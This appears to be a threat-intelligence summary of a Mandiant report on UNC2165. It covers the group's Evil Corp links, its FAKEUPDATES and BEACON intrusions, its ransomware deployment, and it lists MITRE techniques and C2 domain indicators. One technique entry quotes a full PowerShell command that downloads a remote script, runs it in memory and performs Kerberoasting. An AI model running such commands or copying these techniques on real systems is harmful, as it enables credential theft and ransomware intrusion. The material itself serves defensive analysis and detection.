UNC2165 is analyzed as overlapping with Evil Corp activities and shifting toward ransomware deployments such as HADES and LOCKBIT, leveraging FAKEUPDATES, BEACON, and post-exploitation techniques to breach networks while evading sanctions. The report traces the actorβs evolution from DRIDEX/FAKEUPDATES infrastructure to affiliate-style ransomware operations and highlights indicators linking UNC2165 to Evil Corp alongside potential SilverFish overlaps and BEACON C2 activity. hashtags: #UNC2165 #EvilCorp #FAKEUPDATES #BEACON #WASTEDLOCKER #GOLDWINTER #GOLDDRAKE #LOCKBIT
Keypoints
- UNC2165 likely represents an evolution of Evil Corp affiliated activity, with links to DRIDEX/FAKEUPDATES and overlaps in infrastructure and ransomware families.
- Initial access primarily comes from FAKEUPDATES infections that deliver BEACON loaders, sometimes using suspected stolen credentials.
- HADES ransomware is deployed by UNC2165 and shares code/functional similarities with Evil Corp operations; BEACON C&C infrastructure is a recurring element.
- BEACON payloads, including BEACON C&C servers, are publicly reported in association with Evil Corp activity and linked to UNC2165 via multiple artifacts.
- The operation shows heavy credential theft and privilege escalation (Mimikatz, Kerberoasting) and extensive use of post-exploitation tools and scripts.
- Lateral movement relies on BEACON with RDP/SSH, VPNs, and creation of new local accounts; defense evasion includes Defender/AV bypass and registry modifications.
- Data exfiltration often precedes encryption (via Rclone/MEGASync), and there is a trend toward using RaaS (LOCKBIT) to accelerate ransomware deployment.
MITRE Techniques
- [T1189] Drive-by Compromise β
UNC2165 has primarily gained access to victim organizations via FAKEUPDATES infections that ultimately deliver loaders to deploy BEACON samples on impacted hosts. - [T1127.001] MSBuild β
a command appearing in a screenshot within the ProDaft report is consistent with UNC2165 activity. This command reportedly executes a BEACON payload that communicates with the C&C domain tanzaniafisheries[.]com from a .csproj file using msbuild.exe. - [T1059.001] PowerShell β
cmd.exe /C cmd /c powershell -nop -exec bypass -c iex(new-object net.webclient).downloadstring(βhttps://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1β); PowerSharpPack -Rubeus -Command βkerberoastβ - [T1218.011] Rundll32 β
The COLORFAKE DLL is placed within %ProgramData% as a .tmp file, renamed to a DLL, and subsequently executed by RunDLL32 with its export function. - [T1047] Windows Management Instrumentation β
UNC2165 has used WMI to stop and uninstall anti-virus products and other Windows Services prior to ransomware deployment. - [T1112] Modify Registry β
modify multiple Windows Registry keys with an aim to remove some barriers to ransomware execution. - [T1562.001] Disable or Modify Tools β
disable utilities commonly used by administrators such as the Windows task manager, registry tools, and the command prompt. - [T1562.004] Disable or Modify System Firewall/Defenses β
disable Windows Defender and clears Windows event logs as part of the final ransomware execution stages. - [T1021.001] Remote Desktop Protocol β
The threat actors moved laterally within victim environments via RDP. - [T1021.004] SSH β
The threat actors connected via SSH to enterprise storage systems using PuTTy. - [T1053.005] Scheduled Task β
use of scheduled tasks as part of execution/persistence (referenced under broader Execution/Discovery patterns). - [T1558.003] Kerberoasting β
Kerberoasting attacks to obtain extensive credential access in target environments. - [T1003.001] LSASS Memory β
Mimikatz usage to obtain credentials, leveraged with Kerberoasting to expand access.
Indicators of Compromise
- [Domain] tanzaniafisheries.com β BEACON C2 domain used by UNC2165 payloads via .csproj-based loaders.
- [Domain] mwebsoft.com β BEACON C&C server domain reported by others as Evil Corp related activity.
- [Domain] rostraffic.com β BEACON C&C artifact linked to Evil Corp activity.
- [Domain] consultane.com β BEACON C&C artifact linked to Evil Corp activity.
- [Domain] traffichi.com β BEACON C&C artifact linked to Evil Corp activity.
- [Domain] amazingdonutco.com β BEACON C&C artifact linked to Evil Corp activity.
- [Domain] cofeedback.com β BEACON C&C artifact linked to Evil Corp activity.
- [Domain] adsmarketart.com β BEACON C&C artifact linked to Evil Corp activity.
- [Domain] websitelistbuilder.com β BEACON C&C artifact linked to Evil Corp activity.
- [Domain] advancedanalysis.beadsmarketart.com β BEACON C&C artifact linked to Evil Corp activity.
- [Domain] beadsmarketart.com β BEACON C&C artifact linked to Evil Corp activity.
- [Domain] cutyoutube.com β BEACON C&C artifact linked to SilverFish/UNC2165 activity.
- [Domain] onlinemoula.com β BEACON C&C artifact linked to SilverFish/UNC2165 activity.
- [File] VIDRESZR1.dll β COLORFAKE loader DLL placed in %ProgramData% and executed via RunDLL32.
- [File] fileid = β190β β payload retrieval reference used by FAKEUPDATES loader (content fetched by fileid).
Read more: https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions